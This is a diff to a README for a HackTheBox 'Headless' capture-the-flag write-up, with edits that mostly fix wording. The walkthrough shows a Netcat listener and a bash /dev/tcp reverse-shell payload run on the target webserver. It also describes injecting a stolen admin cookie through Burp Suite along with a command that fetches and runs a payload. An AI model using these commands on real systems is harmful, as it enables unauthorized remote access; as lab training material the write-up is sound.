3v401/HackTheBox/Headless/README.md

 ##### Context of the attack

+Once the payload is created, the steps are the following:

 1. The attacker runs the command `nc -nvlp 1111` on his machine to start a Netcat listener on port 1111.
-2. The payload `/bin/bash -c 'exec bash -i >& /dev/tcp/{IP}/1111 0>&1'` is executed on the target machine.
+2. The payload `/bin/bash -c 'exec bash -i >& /dev/tcp/{IP}/1111 0>&1'` is executed on the target machine (webserver).
 This command on the target machine opens a reverse shell, connecting back to the attacker’s machine on port 1111.
-3. The target machine connects to the attacker’s Netcat listener, establishing a reverse shell session.
+3. The target machine connected to the attacker’s Netcat listener, establishes a reverse shell session.
 The attacker can now interact with the target machine’s shell through this connection.

 Let's continue with the situation.
-Be sure to not to close server1, it is necessary to get the payload file, server1 must be running nin the same directory as payload.sh.

-Go to `/dashboard` and click on "Submit" cathing the traffic with Burp-suite.
-Insert admin cookie to get privileges and the command that will fetch the payload created and run it.
+Be sure to not to close server1, it must be running in the same directory as payload.sh.
+Go to `/dashboard` and click on "Submit" to catch the traffic with Burp-suite.
+Insert `admin cookie` to get privileges and the `command that will fetch the payload` created and run it.

 (pic17)